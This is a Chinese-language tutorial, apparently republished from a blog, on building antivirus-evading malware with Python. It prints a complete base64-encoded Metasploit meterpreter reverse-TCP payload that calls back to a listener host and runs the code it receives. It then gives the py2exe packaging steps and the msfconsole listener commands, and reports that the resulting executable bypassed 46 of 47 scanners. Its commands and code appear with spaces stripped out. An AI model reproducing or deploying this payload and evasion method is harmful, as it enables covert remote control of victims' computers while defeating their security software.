使用Python进行防病毒免杀解析
很多渗透工具都提供了权限维持的能力,如Metasploit、Empire和CobaltStrike,但是都会被防病毒软件检测到这种恶意行为。在探讨一个权限维持技巧的时候,似乎越来越多的人关注的是,这个方式会不会被被杀软杀掉?
打造免杀的payload成了一个很重要的话题,在这里,本文将介绍如何使用Pyhton轻松绕过防病毒软件。
0x01环境准备
1、软件安装
Python2.7.16x86:https://www.python.org/ftp/python/2.7.16/python-2.7.16.msi
Py2exe32位:https://sourceforge.net/projects/py2exe/files/py2exe/0.6.9/py2exe-0.6.9.win32-py2.7.exe/download
2、msfvenom生成PythonPayload
msfvenom-ppython/meterpreter/reverse_tcpLHOST=192.168.28.128LPORT=443-fraw-o/var/www/html/evil.py
evil.py代码如下:
importbase64,sys;exec(base64.b64decode({2:str,3:lambdab:bytes(b,'UTF-8')}[sys.version_info[0]]('aW1wb3J0IHNvY2tldCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJzE5Mi4xNjguMjguMTI4Jyw0NDMpKQoJCWJyZWFrCglleGNlcHQ6CgkJdGltZS5zbGVlcCg1KQpsPXN0cnVjdC51bnBhY2soJz5JJyxzLnJlY3YoNCkpWzBdCmQ9cy5yZWN2KGwpCndoaWxlIGxlbihkKTxsOgoJZCs9cy5yZWN2KGwtbGVuKGQpKQpleGVjKGQseydzJzpzfSkK')))
0x02py2exe打包Python程序
将evil.py复制到windows,同时创建一个setup.py文件:
fromdistutils.coreimportsetup importpy2exe setup( name='Meter', description='Python-basedApp', version='1.0', console=['evil.py'], options={'py2exe':{'bundle_files':1,'packages':'ctypes','includes':'base64,sys,socket,struct,time,code,platform,getpass,shutil',}}, zipfile=None, )
下面的方法运行evil.py,生成可执行文件。
python./setup.pypy2exe
0x03设置监听端口
Kali运行Metasploit,设置监听:
msfconsole useexploit/multi/handler setPAYLOADpython/meterpreter/reverse_tcp setLHOST192.168.28.128 setLPORT443 run
在Windows中运行evil.exe,获得一个meterpreter的会话
0x04免杀验证
确认生成的exe文件可正常工作,接下来对evil.exe进行在线病毒扫描,以确认免杀效果如何。
这里我们使用VirSCAN.org-多引擎在线病毒扫描网v1.02,当前支持47款杀毒引擎
扫描结果:47款杀毒引擎中,只有一个引擎报毒,主流的杀毒软件全部绕过。
网站地址:http://www.virscan.org
参考文章:
https://medium.com/bugbountywriteup/antivirus-evasion-with-python-49185295caf1
总结
以上所述是小编给大家介绍的使用Python进行防病毒免杀,希望对大家有所帮助,如果大家有任何疑问请给我留言,小编会及时回复大家的。在此也非常感谢大家对毛票票网站的支持!
如果你觉得本文对你有帮助,欢迎转载,烦请注明出处,谢谢!
声明:本文内容来源于网络,版权归原作者所有,内容由互联网用户自发贡献自行上传,本网站不拥有所有权,未作人工编辑处理,也不承担相关法律责任。如果您发现有涉嫌版权的内容,欢迎发送邮件至:czq8825#qq.com(发邮件时,请将#更换为@)进行举报,并提供相关证据,一经查实,本站将立刻删除涉嫌侵权内容。